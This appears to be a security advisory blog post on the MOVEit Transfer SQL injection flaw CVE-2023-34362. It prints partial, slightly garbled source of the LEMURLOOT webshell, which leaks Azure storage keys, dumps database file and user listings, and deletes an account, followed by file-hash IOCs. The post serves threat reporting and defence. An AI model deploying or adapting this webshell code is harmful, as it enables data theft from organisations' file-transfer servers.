MOVEit SQL Injection Vulnerability CVE-2023-34362
A SQL injection vulnerability has been discovered in MOVEit Transfer version 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), which could allow an unauthenticated attacker to access MOVEit Transfer's database without authorization. In addition to performing SQL commands that change or remove database items, an attacker may be able to infer details about the database's structure and contents depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL)
As from Progress which disclosed the vulnerability publicly on May 31, 2023,
A SQL injection vulnerability has been discovered in MOVEit Transfer version 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), which could allow an unauthenticated attacker to access MOVEit Transfer's database without authorization. In addition to performing SQL commands that change or remove database items, an attacker may be able to infer details about the database's structure and contents depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL).
It is observed, there are many open SSH MOVEit Transfer SFTP servers are exposed to internet and are vulnerable. Majority of the vulnerable services are located in USA
According to Mandiant from its analysis report on Zero Day Vulnerability in MOVEit. Post exploitation of the vulnerability, it is found that the attacker had deploy a newly discovered LEMURLOOT Webshell.
The LEMURLOOT Webshell is written in C# and targeted for Microsoft Web Servers
Webshell (human2.aspx)
<%@ Page Language="C
<%@ Import Namespace="MOVEit.DMZ.ClassLib" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Infrastructure.Data" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Files" %>
<%@ Import Namespace="MOVEit.DMZ.Cryptography.Contracts" %>
<%@ Import Namespace="MOVEit.DMZ.Core.Cryptography" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.FileSystem" %>
<%@ Import Namespace="MOVEit.DMZ.Core" %>
<%@ Import Namespace="MOVEit.DMZ.Core.Data" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Users" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Users.Enum" %>
<%@ Import Namespace="MOVEit.DMZ.Application.Contracts.Users" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<script runat="server">
private Object connectDB() {
var MySQLConnect = new DbConn(SystemSettings.DatabaseSettings())
bool flag = false
string text = null
flag = MySQLConnect.Connect()
if (
flag) {
return text
return MySQLConnect
private Random random = new Random()
public string RandomString(int length) {
const string chars = "abcdefghijklmnopqrstuvwxyz0123456789"
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray())
protected void Page_load(object sender, EventArgs e) {
var pass = Request.Headers["X-siLock-Comment"]
String.Equals(pass, "REDACTEDREDACTEDREDACTEDREDACTED")) {
Response.StatusCode = 404
return
Response.AppendHeader("X-siLock-Comment", "comment")
var instid = Request.Headers["X-siLock-Step1"]
string x = null
DbConn MySQLConnect = null
var r = connectDB()
if (r is String) {
Response.Write("OpenConn: Could not connect to DB: " + r)
try {
MySQLConnect = (DbConn) r
if (int.Parse(instid) == -1) {
string azureAccout = SystemSettings.AzureBlobStorageAccount
string azureBlobKey = SystemSettings.AzureBlobKey
string azureBlobContainer = SystemSettings.AzureBlobContainer
Response.AppendHeader("AzureBlobStorageAccount", azureAccout)
Response.AppendHeader("AzureBlobKey", azureBlobKey)
Response.AppendHeader("AzureBlobContainer", azureBlobContainer)
var query = "select f.id, f.instid, f.folderid, filesize, f.Name as Name, u.LoginName as uploader, fr.FolderPath , fr.name as fname from folders fr, files f left join users u on f.UploadUsername = u.Username where f.FolderID = fr.ID"
string reStr = "ID,InstID,FolderID,FileSize,Name,Uploader,FolderPath,FolderName\n"
var set = new RecordSetFactory(MySQLConnect).GetRecordset(query, null, true, out x)
set.EOF) {
while (
reStr += String.Format("{0},{1},{2},{3},{4},{5},{6},{7}\n", set["ID"].Value, set["InstID"].Value, set["FolderID"].Value, set["FileSize"].Value, set["Name"].Value, set["uploader"].Value, set["FolderPath"].Value, set["fname"].Value)
set.MoveNext()
}
reStr += "----------------------------------\nFolderID,InstID,FolderName,Owner,FolderPath\n"
String query1 = "select ID, f.instID, name, u.LoginName as owner, FolderPath from folders f left join users u on f.owner = u.Username"
set = new RecordSetFactory(MySQLConnect).GetRecordset(query1, null, true, out x)
reStr += String.Format("{0},{1},{2},{3},{4}\n", set["id"].Value, set["instID"].Value, set["name"].Value, set["owner"].Value, set["FolderPath"].Value)
reStr += "----------------------------------\nInstID,InstName,ShortName\n"
query1 = "select id, name, shortname from institutions"
reStr += String.Format("{0},{1},{2}\n", set["ID"].Value, set["name"].Value, set["ShortName"].Value)
using(var gzipStream = new GZipStream(Response.OutputStream, CompressionMode.Compress)) {
using(var writer = new StreamWriter(gzipStream, Encoding.UTF8)) {
writer.Write(reStr)
} else if (int.Parse(instid) == -2) {
var query = String.Format("Delete FROM users WHERE RealName='Health Check Service'")
new RecordSetFactory(MySQLConnect).GetRecordset(query, null, true, out x)
} else {
var fileid = Request.Headers["X-siLock-Step3"]
var folderid = Request.Headers["X-siLock-Step2"]
if (fileid == null
folderid == null) {
SessionIDManager Manager = new SessionIDManager()
string NewID = Manager.CreateSessionID(Context)
....
Truncated
IOC's
38e69f4a6d2e81f28ed2dc6df0daf31e73ea365bd2cfc90ebc31441404cca264
3a977446ed70b02864ef8cfa3135d8b134c93ef868a4cc0aa5d3c2a74545725b
b1c299a9fe6076f370178de7b808f36135df16c4e438ef6453a39565ff2ec272
c77438e8657518221613fbce451c664a75f05beea2184a3ae67f30ea71d34f37
702421bcee1785d93271d311f0203da34cc936317e299575b06503945a6ea1e0
387cee566aedbafa8c114ed1c6b98d8b9b65e9f178cf2f6ae2f5ac441082747a
4359aead416b1b2df8ad9e53c497806403a2253b7e13c03317fc08ad3b0b95bf
daaa102d82550f97642887514093c98ccd51735e025995c2cc14718330a856f4
6015fed13c5510bbb89b0a5302c8b95a5b811982ff6de9930725c4630ec4011d
9d1723777de67bc7e11678db800d2a32de3bcd6c40a629cd165e3f7bbace8ead
c56bcb513248885673645ff1df44d3661a75cfacdce485535da898aa9ba320d4
0ea05169d111415903a1098110c34cdbbd390c23016cd4e179dd9ef507104495
d49cf23d83b2743c573ba383bf6f3c28da41ac5f745cde41ef8cd1344528c195
5b566de1aa4b2f79f579cdac6283b33e98fdc8c1cfa6211a787f8156848d67ff
f0d85b65b9f6942c75271209138ab24a73da29a06bc6cc4faeddcb825058c09d
fe5f8388ccea7c548d587d1e2843921c038a9f4ddad3cb03f3aa8a45c29c6a2f
9e89d9f045664996067a05610ea2b0ad4f7f502f73d84321fb07861348fdc24a
ea433739fb708f5d25c937925e499c8d2228bf245653ee89a6f3d26a5fd00b7a
cf23ea0d63b4c4c348865cefd70c35727ea8c82ba86d56635e488d816e60ea45
2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5
348e435196dd795e1ec31169bd111c7ec964e5a6ab525a562b17f10de0ab031d
b9a0baf82feb08e42fa6ca53e9ec379e79fbe8362a7dac6150eb39c2d33d94ad
a1269294254e958e0e58fc0fe887ebbc4201d5c266557f09c3f37542bd6d53d7
48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a
d477ec94e522b8d741f46b2c00291da05c72d21c359244ccb1c211c12b635899
3ab73ea9aebf271e5f3ed701286701d0be688bf7ad4fb276cb4fbe35c8af8409
What's Your Reaction?
